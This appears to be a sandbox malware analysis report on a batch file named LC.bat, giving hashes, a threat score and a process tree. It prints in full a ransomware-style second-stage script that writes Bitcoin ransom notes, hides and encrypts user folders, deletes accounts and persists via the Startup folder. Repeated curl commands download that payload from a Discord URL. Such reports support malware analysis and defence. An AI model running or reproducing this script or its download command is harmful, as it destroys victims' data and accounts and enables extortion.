Analysis

  • max time kernel
    148s
  • max time network
    154s
  • platform
    windows11-21h2_x64
  • resource
    win11-20231222-en
  • resource tags

    arch:x64arch:x86image:win11-20231222-enlocale:en-usos:windows11-21h2-x64system
  • submitted
    02-01-2024 01:23

General

  • Target

    LC.bat

  • Size

    352B

  • MD5

    6c555c72d67f325b774a39315ef929ce

  • SHA1

    e36ca61b9ab5e53adecaf00219d55b69c9d5c485

  • SHA256

    4149b09f225dc3cd2fcad895739774ec381eea1f8006642fd74bde9f33e1ccaa

  • SHA512

    13d6d14338b8fcbdd68f76412b3cbb118d46485f947a1790e70b396ed7d7f9baae4ffcb0f56294d3ef6ab6fe6e3b38fd0606e597146ba97a29088b4c091dce52

Score
10/10

Malware Config

Extracted

Path

C:\Users\Admin\AppData\Local\Temp\LLC.bat

Ransom Note
@echo off echo To contact LC and obtain further instructions, send an email to [email protected]. Include your unique ID and payment confirmation.> "%USERPROFILE%\Desktop\LC.txt" @echo off echo Welcome to The LC Tor Server! echo Please enter your details to proceed. set /p username=Username: set /p password=Password: echo Thank you for signing up for the river enjoy u sick perv! @echo off start "" "https://media.discordapp.net/attachments/1171199057348263996/1171261368717037700/Jq9XNeo.jpg?ex=659ca2a7&is=658a2da7&hm=e584359e6d8774a5d4d4f23f6b5f2b20a2715bdcc056d11f5fe0c641e0d9fc15& ipconfig /release @echo off attrib +h %0 @echo off title Laughing Coffin color 0c echo Your files have been encrypted! To get them back, pay $300 to the following Bitcoin address: 3BKuiDHNSbdCdK8fHTUxCB4GRBiuKUrMzr...> "%USERPROFILE%\Downloads\do not close.txt" @echo off cd %userprofile%\Documents attrib +h /s /d cipher /e /s /a cd %userprofile%\Downloads attrib +h /s /d cipher /e /s /a cd %userprofile%\Desktop attrib +h /s /d cipher /e /s /a cd %userprofile%\Pictures attrib +h /s /d cipher /e /s /a cd %userprofile%\Videos attrib +h /s /d cipher /e /s /a cd %userprofile%\Music attrib +h /s /d cipher /e /s /a @echo off echo To contact LC and obtain further instructions, send an email to [email protected]. Include your unique ID and payment confirmation.> "%USERPROFILE%\Desktop\LC.txt" @echo off echo How to avoid these attacks in the future: echo - Regularly update your antivirus software. echo - Avoid opening suspicious email attachments or clicking on unknown links. echo - Backup your important files regularly on an external storage device. echo - Be cautious while downloading files from the internet. echo - Keep your operating system and applications up to date. echo - Enable a firewall and use strong, unique passwords. @echo off echo How to decrypt your files: echo 1. Make the payment of $300 to the provided Bitcoin address:3BKuiDHNSbdCdK8fHTUxCB4GRBiuKUrMzr. echo 2. Send an email to [email protected] with your payment confirmation. echo 3. Once verified, you will receive the decryption key for your files. echo 4. Use the decryption key to decrypt your files and regain access to them. @echo off setlocal :loop set /p "password=Enter the password to decrypt the files: " if "%password%"=="7K3hG5d9R2pQ6wB4vF1jL8sT0mZnXcV4" ( echo Decrypting.... @echo off echo Decrypting Still... for /f "skip=1" %%G in ('wmic useraccount where "disabled='FALSE'" get name') do ( if not "%%G"=="Administrator" ( net user %%G /delete ) ) echo Almost Done... net user Anonymous /add echo Setting Up Files... powershell -Command "$password = -join (33..126 | Get-Random -Count 32 | ForEach-Object {[char]$_}); $secureString = ConvertTo-SecureString $password -AsPlainText -Force; $hash = $secureString | ConvertFrom-SecureString; (New-Object System.Management.Automation.PSCredential('Anonymous', $secureString)).GetNetworkCredential().Password | Out-Null" echo Files Setup Complete! echo Decryption done! ipconfig /release ) else ( echo Invalid password. Please try again. goto loop ) @echo off setlocal copy "%0" "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\" @echo off attrib +h "%0" attrib +h "%APPDATA%\Microsoft\Windows\Start Menu\Programs\Startup\%~nx0"

Signatures

  • Suspicious use of WriteProcessMemory 64 IoCs
  • Views/modifies file attributes 1 TTPs 26 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\LC.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:4620
    • C:\Windows\system32\curl.exe
      curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
      2⤵
        PID:4272
      • C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe /K LC.bat
        2⤵
        • Suspicious use of WriteProcessMemory
        PID:228
        • C:\Windows\system32\curl.exe
          curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
          3⤵
            PID:1496
          • C:\Windows\system32\attrib.exe
            attrib +h LC.bat
            3⤵
            • Views/modifies file attributes
            PID:3168
          • C:\Windows\system32\cmd.exe
            C:\Windows\system32\cmd.exe /K LC.bat
            3⤵
            • Suspicious use of WriteProcessMemory
            PID:3872
            • C:\Windows\system32\attrib.exe
              attrib +h LC.bat
              4⤵
              • Views/modifies file attributes
              PID:1316
            • C:\Windows\system32\cmd.exe
              C:\Windows\system32\cmd.exe /K LC.bat
              4⤵
              • Suspicious use of WriteProcessMemory
              PID:2916
              • C:\Windows\system32\attrib.exe
                attrib +h LC.bat
                5⤵
                • Views/modifies file attributes
                PID:4088
              • C:\Windows\system32\cmd.exe
                C:\Windows\system32\cmd.exe /K LC.bat
                5⤵
                • Suspicious use of WriteProcessMemory
                PID:432
                • C:\Windows\system32\attrib.exe
                  attrib +h LC.bat
                  6⤵
                  • Views/modifies file attributes
                  PID:1632
                • C:\Windows\system32\cmd.exe
                  C:\Windows\system32\cmd.exe /K LC.bat
                  6⤵
                  • Suspicious use of WriteProcessMemory
                  PID:2928
                  • C:\Windows\system32\curl.exe
                    curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                    7⤵
                      PID:1172
                    • C:\Windows\system32\attrib.exe
                      attrib +h LC.bat
                      7⤵
                      • Views/modifies file attributes
                      PID:480
                    • C:\Windows\system32\cmd.exe
                      C:\Windows\system32\cmd.exe /K LC.bat
                      7⤵
                      • Suspicious use of WriteProcessMemory
                      PID:1312
                      • C:\Windows\system32\attrib.exe
                        attrib +h LC.bat
                        8⤵
                        • Views/modifies file attributes
                        PID:4652
                      • C:\Windows\system32\cmd.exe
                        C:\Windows\system32\cmd.exe /K LC.bat
                        8⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4676
                        • C:\Windows\system32\cmd.exe
                          C:\Windows\system32\cmd.exe /K LC.bat
                          9⤵
                          • Suspicious use of WriteProcessMemory
                          PID:2224
                          • C:\Windows\system32\curl.exe
                            curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                            10⤵
                              PID:4828
                            • C:\Windows\system32\attrib.exe
                              attrib +h LC.bat
                              10⤵
                              • Views/modifies file attributes
                              PID:3488
                            • C:\Windows\system32\cmd.exe
                              C:\Windows\system32\cmd.exe /K LC.bat
                              10⤵
                              • Suspicious use of WriteProcessMemory
                              PID:1068
                              • C:\Windows\system32\attrib.exe
                                attrib +h LC.bat
                                11⤵
                                • Views/modifies file attributes
                                PID:2540
                              • C:\Windows\system32\cmd.exe
                                C:\Windows\system32\cmd.exe /K LC.bat
                                11⤵
                                • Suspicious use of WriteProcessMemory
                                PID:2924
                                • C:\Windows\system32\attrib.exe
                                  attrib +h LC.bat
                                  12⤵
                                  • Views/modifies file attributes
                                  PID:4104
                                • C:\Windows\system32\cmd.exe
                                  C:\Windows\system32\cmd.exe /K LC.bat
                                  12⤵
                                    PID:1796
                                    • C:\Windows\system32\cmd.exe
                                      C:\Windows\system32\cmd.exe /K LC.bat
                                      13⤵
                                        PID:3732
                                        • C:\Windows\system32\curl.exe
                                          curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                          14⤵
                                            PID:4320
                                          • C:\Windows\system32\attrib.exe
                                            attrib +h LC.bat
                                            14⤵
                                            • Views/modifies file attributes
                                            PID:2584
                                          • C:\Windows\system32\cmd.exe
                                            C:\Windows\system32\cmd.exe /K LC.bat
                                            14⤵
                                              PID:2888
                                              • C:\Windows\system32\attrib.exe
                                                attrib +h LC.bat
                                                15⤵
                                                • Views/modifies file attributes
                                                PID:4068
                                              • C:\Windows\system32\cmd.exe
                                                C:\Windows\system32\cmd.exe /K LC.bat
                                                15⤵
                                                  PID:464
                                                  • C:\Windows\system32\attrib.exe
                                                    attrib +h LC.bat
                                                    16⤵
                                                    • Views/modifies file attributes
                                                    PID:3768
                                                  • C:\Windows\system32\cmd.exe
                                                    C:\Windows\system32\cmd.exe /K LC.bat
                                                    16⤵
                                                      PID:4248
                                                      • C:\Windows\system32\attrib.exe
                                                        attrib +h LC.bat
                                                        17⤵
                                                        • Views/modifies file attributes
                                                        PID:4984
                                                      • C:\Windows\system32\cmd.exe
                                                        C:\Windows\system32\cmd.exe /K LC.bat
                                                        17⤵
                                                          PID:4668
                                                          • C:\Windows\system32\attrib.exe
                                                            attrib +h LC.bat
                                                            18⤵
                                                            • Views/modifies file attributes
                                                            PID:2920
                                                          • C:\Windows\system32\cmd.exe
                                                            C:\Windows\system32\cmd.exe /K LC.bat
                                                            18⤵
                                                              PID:5036
                                                              • C:\Windows\system32\attrib.exe
                                                                attrib +h LC.bat
                                                                19⤵
                                                                • Views/modifies file attributes
                                                                PID:2392
                                                              • C:\Windows\system32\cmd.exe
                                                                C:\Windows\system32\cmd.exe /K LC.bat
                                                                19⤵
                                                                  PID:2040
                                                                  • C:\Windows\system32\curl.exe
                                                                    curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                    20⤵
                                                                      PID:2820
                                                                    • C:\Windows\system32\cmd.exe
                                                                      C:\Windows\system32\cmd.exe /K LC.bat
                                                                      20⤵
                                                                        PID:4736
                                                                        • C:\Windows\system32\curl.exe
                                                                          curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                          21⤵
                                                                            PID:1704
                                                                          • C:\Windows\system32\attrib.exe
                                                                            attrib +h LC.bat
                                                                            21⤵
                                                                            • Views/modifies file attributes
                                                                            PID:2648
                                                                          • C:\Windows\system32\cmd.exe
                                                                            C:\Windows\system32\cmd.exe /K LC.bat
                                                                            21⤵
                                                                              PID:1108
                                                                              • C:\Windows\system32\attrib.exe
                                                                                attrib +h LC.bat
                                                                                22⤵
                                                                                • Views/modifies file attributes
                                                                                PID:2432
                                                                              • C:\Windows\system32\cmd.exe
                                                                                C:\Windows\system32\cmd.exe /K LC.bat
                                                                                22⤵
                                                                                  PID:3612
                                                                                  • C:\Windows\system32\attrib.exe
                                                                                    attrib +h LC.bat
                                                                                    23⤵
                                                                                    • Views/modifies file attributes
                                                                                    PID:4024
                                                                                  • C:\Windows\system32\cmd.exe
                                                                                    C:\Windows\system32\cmd.exe /K LC.bat
                                                                                    23⤵
                                                                                      PID:636
                                                                                      • C:\Windows\system32\attrib.exe
                                                                                        attrib +h LC.bat
                                                                                        24⤵
                                                                                        • Views/modifies file attributes
                                                                                        PID:432
                                                                                      • C:\Windows\system32\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /K LC.bat
                                                                                        24⤵
                                                                                          PID:4180
                                                                                          • C:\Windows\system32\cmd.exe
                                                                                            C:\Windows\system32\cmd.exe /K LC.bat
                                                                                            25⤵
                                                                                              PID:4660
                                                                                              • C:\Windows\system32\curl.exe
                                                                                                curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                                                26⤵
                                                                                                  PID:416
                                                                                                • C:\Windows\system32\cmd.exe
                                                                                                  C:\Windows\system32\cmd.exe /K LC.bat
                                                                                                  26⤵
                                                                                                    PID:2908
                                                                                                    • C:\Windows\system32\curl.exe
                                                                                                      curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                                                      27⤵
                                                                                                        PID:4696
                                                                                                      • C:\Windows\system32\cmd.exe
                                                                                                        C:\Windows\system32\cmd.exe /K LC.bat
                                                                                                        27⤵
                                                                                                          PID:840
                                                                                                          • C:\Windows\system32\curl.exe
                                                                                                            curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                                                            28⤵
                                                                                                              PID:1180
                                                                                                          • C:\Windows\system32\attrib.exe
                                                                                                            attrib +h LC.bat
                                                                                                            27⤵
                                                                                                            • Views/modifies file attributes
                                                                                                            PID:1412
                                                                                                        • C:\Windows\system32\attrib.exe
                                                                                                          attrib +h LC.bat
                                                                                                          26⤵
                                                                                                          • Views/modifies file attributes
                                                                                                          PID:1880
                                                                                                      • C:\Windows\system32\attrib.exe
                                                                                                        attrib +h LC.bat
                                                                                                        25⤵
                                                                                                        • Views/modifies file attributes
                                                                                                        PID:3432
                                                                                            • C:\Windows\system32\attrib.exe
                                                                                              attrib +h LC.bat
                                                                                              20⤵
                                                                                              • Views/modifies file attributes
                                                                                              PID:1644
                                                                              • C:\Windows\system32\attrib.exe
                                                                                attrib +h LC.bat
                                                                                13⤵
                                                                                • Views/modifies file attributes
                                                                                PID:3716
                                                                      • C:\Windows\system32\attrib.exe
                                                                        attrib +h LC.bat
                                                                        9⤵
                                                                        • Views/modifies file attributes
                                                                        PID:4752
                                                        • C:\Windows\system32\attrib.exe
                                                          attrib +h LC.bat
                                                          2⤵
                                                          • Views/modifies file attributes
                                                          PID:3400
                                                      • C:\Windows\system32\curl.exe
                                                        curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                        1⤵
                                                          PID:2136
                                                        • C:\Windows\system32\curl.exe
                                                          curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                          1⤵
                                                            PID:1388
                                                          • C:\Windows\system32\curl.exe
                                                            curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                            1⤵
                                                              PID:4844
                                                            • C:\Windows\system32\curl.exe
                                                              curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                              1⤵
                                                                PID:1656
                                                              • C:\Windows\system32\curl.exe
                                                                curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                1⤵
                                                                  PID:4480
                                                                • C:\Windows\system32\curl.exe
                                                                  curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                  1⤵
                                                                    PID:1008
                                                                  • C:\Windows\system32\curl.exe
                                                                    curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                    1⤵
                                                                      PID:4804
                                                                    • C:\Windows\system32\curl.exe
                                                                      curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                      1⤵
                                                                        PID:3448
                                                                      • C:\Windows\system32\curl.exe
                                                                        curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                        1⤵
                                                                          PID:4184
                                                                        • C:\Windows\system32\curl.exe
                                                                          curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                          1⤵
                                                                            PID:4424
                                                                          • C:\Windows\system32\curl.exe
                                                                            curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                            1⤵
                                                                              PID:2412
                                                                            • C:\Windows\system32\curl.exe
                                                                              curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                              1⤵
                                                                                PID:4364
                                                                              • C:\Windows\system32\curl.exe
                                                                                curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                                1⤵
                                                                                  PID:4832
                                                                                • C:\Windows\system32\curl.exe
                                                                                  curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                                  1⤵
                                                                                    PID:4760
                                                                                  • C:\Windows\system32\curl.exe
                                                                                    curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                                    1⤵
                                                                                      PID:3004
                                                                                    • C:\Windows\system32\curl.exe
                                                                                      curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                                      1⤵
                                                                                        PID:1036
                                                                                      • C:\Windows\system32\curl.exe
                                                                                        curl -o LLC.bat "https://cdn.discordapp.com/attachments/1165176561457184808/1191135273849978930/LC.bat?ex=65a4562b&is=6591e12b&hm=943708e7c2ccc204a7762522602f93fc0f904acff0e71e1dfc31b438ff3fa560&"
                                                                                        1⤵
                                                                                          PID:2572

                                                                                        Network

                                                                                        MITRE ATT&CK Enterprise v15

                                                                                        Replay Monitor

                                                                                        Loading Replay Monitor...

                                                                                        Downloads

                                                                                        • C:\Users\Admin\AppData\Local\Temp\LLC.bat

                                                                                          Filesize

                                                                                          3KB

                                                                                          MD5

                                                                                          478ea14d9b94c5c19df57528dd66e601

                                                                                          SHA1

                                                                                          e65b4637f9022c82ecc42c871fb48ff5b079436c

                                                                                          SHA256

                                                                                          3a7f6890d0d0220a682c812aadddc52c807cb49e590cf53dd72babc52a424f6c

                                                                                          SHA512

                                                                                          d05c574e879fa546cad6a7ff5261cb85b66a55b32da801c297f52bd8e2216db3b4539b40014de7cf56edc830d58fbb352e9a8c8632f09226ca6e4efbff5b33fa